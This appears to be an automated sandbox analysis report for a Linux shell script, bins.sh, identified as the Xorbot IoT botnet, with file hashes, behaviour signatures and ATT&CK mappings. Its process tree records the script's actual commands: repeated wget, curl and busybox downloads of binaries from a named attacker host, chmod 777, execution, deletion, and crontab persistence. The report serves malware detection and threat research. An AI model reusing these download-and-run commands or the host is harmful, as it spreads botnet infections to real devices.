Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
-
submitted
28/02/2025, 19:33
General
-
Target
bins.sh
-
Size
10KB
-
MD5
0d6abf13920f9568901114a1d17cdfd6
-
SHA1
8f51702b2844fafb5952fa36d21c2b47de532b5f
-
SHA256
7c0a391f5ce85b25149f47e7cdce3f47658ea8439a5d487d05833573f20ff9cb
-
SHA512
0e8c146bd5d415028be102875ebb16d2b898f3923252b11cfeb179fd58a8ef36a54772709f514d6297449e8fdb4246740084f9ed93dad9bdd675905cdf67b795
-
SSDEEP
192:RdZtmvfC3A3k3x3+3e3LjHkJpgL5d5l5uFpY90cva22sYaGiQa3vvLCLuLzm+v0q:RdZtmvfC3A3k3x3+3e3LjHkJpgLHzJ9p
Malware Config
Signatures
-
Detects Xorbot 5 IoCs
-
Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
-
Xorbot family
-
Contacts a large (1748) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 5 IoCs
-
Renames itself 1 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 18 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- File and Directory Permissions Modification
-
-
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
-
-
/bin/rmrm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- File and Directory Permissions Modification
-
-
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
-
-
/bin/rmrm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- File and Directory Permissions Modification
-
-
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
-
-
/bin/rmrm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- File and Directory Permissions Modification
-
-
/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
-
-
/bin/rmrm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- File and Directory Permissions Modification
-
-
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- Renames itself
- Reads runtime system information
- System Network Configuration Discovery
-
/bin/shsh -c "crontab -l"3⤵
-
/usr/bin/crontabcrontab -l4⤵
-
-
-
/bin/shsh -c "crontab -"3⤵
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
-
-
-
-
/bin/rmrm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- System Network Configuration Discovery
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5701e7a55a4f3650f5feee92a9860e5fc
SHA16ce4a7f0dc80fe557a0ace4de25e6305af221ed4
SHA256ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588
SHA5127352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD5dac86425a4945579a0042adc4eae3bfe
SHA1a2cab09f305098818ace9255ce22e9531ec77773
SHA256574d1642557f461d3bda05fe0db3eb1cdab8335804f5f04b6b283412de55aea7
SHA51240b72f34bc33e9cab3e12553c3648e31b035eb0caf388f20466718f884854136ebb57b8f210415dcea64a1aaa3c5d6b68705bae4b0221e09daa27c0db83f14dc